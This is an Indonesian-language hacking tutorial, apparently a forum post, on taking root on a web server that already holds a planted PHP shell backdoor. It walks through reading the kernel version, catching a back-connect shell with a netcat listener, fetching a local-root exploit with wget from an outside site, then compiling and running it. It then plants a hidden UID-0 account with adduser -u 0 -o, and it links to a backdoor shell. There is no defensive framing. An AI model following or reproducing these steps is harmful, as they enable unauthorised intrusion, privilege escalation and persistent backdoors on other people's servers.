Root Server & Tambah User Root Baru

chmood

:)Dear T.I Sniper Family,:)

Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah

  • Komputer & Kopi susu tambah roti kaya kaka .!
  • Situs target yang sudah di inject β€œshell backdoor”
  • Tool-tool Localroot Exploit
  • Netcat

1 – CARI INFORMASI DETAIL SERVER TARGET

Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor β€œshell php”

Tampilannya akan seperti dibawah:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di β€œshell backdoor” seperti contoh di atas yaitu:
Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686
Atau anda juga bisa menggunakan dan menjalankan perintah:Β uname -a
Dari informasi diatas kita ketahui bahwa kernelnya adalah:Β Β 2.6.18-8 i686
Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan β€œLocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini:Β 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.
Kita cari disini saja localroot exploitnya, kebetulan banyak listnya:Β localroot.th3-0utl4ws

Download Now

2 – BACKCONNECTING DARI SERVER KE KOMPUTER ATTACKER

Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:
  1. Netcat Tools (Harus sudah terinstall di komputer)
  2. Open port (Port-port yang secara otomatis terbuka)
Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalahΒ 443:
C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443
Kemudian tekan β€œEnter”
Nanti akan muncul pesan β€œListening on [any] 443 …”
Setelah itu, kita kembali ke β€œshell backkdor” yang sudah kita tanamkan.
Cari fungsi β€œBack Connectβ€œ, kemudian isikan IP yang kita miliki & port.

Misal: IP Kita:Β 10.10.10.10Β dan port:Β 443, seperti gambar dibawah:
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Kita jalankan perintah β€œConnect”
Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

3 – DOWNLOAD EXPLOIT & EKSEKUSI EXPLOIT

Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu
1) Menggunakan fungsi β€œWGET / CURL”
2) Bisa menggunakan caraΒ upload manualΒ dari shell

Berhubung di server ini β€œWGET” bisa dilakukan, maka download localroot exploit memakai fungsi β€œWGET”.
Oke, copy saja download link β€œlocalroot exploit yang tepat:

Download Kumpulan Tools Localroot Dari Th3-0utl4ws
Untuk mendownload tools diatas ketikkan saja perintah:Β wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip

Apabila sudah terdownload maka extract β€œlocal root tools” tersebut, bisa dengan menggunakan perintah β€œunzip” atau β€œuntar” atau β€œtar”
Seperti contoh diatas, β€œlocalroot exploit sudah terdownload” dan ter-extract:
unzip prct1.c.zip
Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa β€œC”, maka yang digunakan adalah perintah GCC:
gcc prct1.c -o prc
Kemudian jalankan:
Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools β€œlocal root” exploit yang lainnya. (JANGAN MENYERAH!)
Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!
Unzip lagi file localroot exploit yang lainnya:Β unzip 2.6.18-164.zip

Nah, localroot exploit diatas sangat cocok untuk kernel ini: (β€œ2.6.18-164β€œ)
Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi β€œ777”, seperti contoh berikut:
chmod 777 2.6.18-164
Kemudian jalankan exploit:
./2.6.18-164
Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:
id
or
whoami

Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!

4 – MENAMBAHKAN USER ROOT BARU

Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user β€œHaxorfortutorialβ€œ:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -MΒ Haxorfortutorial
Penjelasan perintah:
Quote:

adduser – Perintah dasar linux untuk menambahkan user
-uΒ 0 -o – set user menjadi dengan ID nol (0) root.
-gΒ 0 – Set initial group dengan ID nol (0) root.
-GΒ 0,1,2,3,4,6,10 – Set additional group ke:
0Β = root
1Β = bin
2Β = daemon
3Β = sys
4Β = adm
6Β = disk
10Β = wheel

-M – β€˜home directory’ tidak di create ke user.
Haxorfortutorial – User name of the new user account.
Catatan: Rubah userΒ HaxorfortutorialΒ sesuai dengan username yang kalian inginkan, ini hanya contoh sajaΒ :)
Selanjutnya, lakukan set password untuk user yang telah kita buat.
Perintahnya:
passwdΒ Haxorfortutorial

Contoh implementasi:
[root@fedora ~]# passwdΒ Haxorfortutorial
Changing password for userΒ Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

id Haxorfortutorial
Backdoor GNY shell – http://privatepaste.com/1321f97984
Tools NetCat – http://downloadnetcat.com/nc11nt.zip

:)Demikian tutorial singkat cara ngeroot server dengan mudah, semoga selalu berhasil ngeroot! SelesaiΒ :)
:)Source article by m.3.h.d.i!:)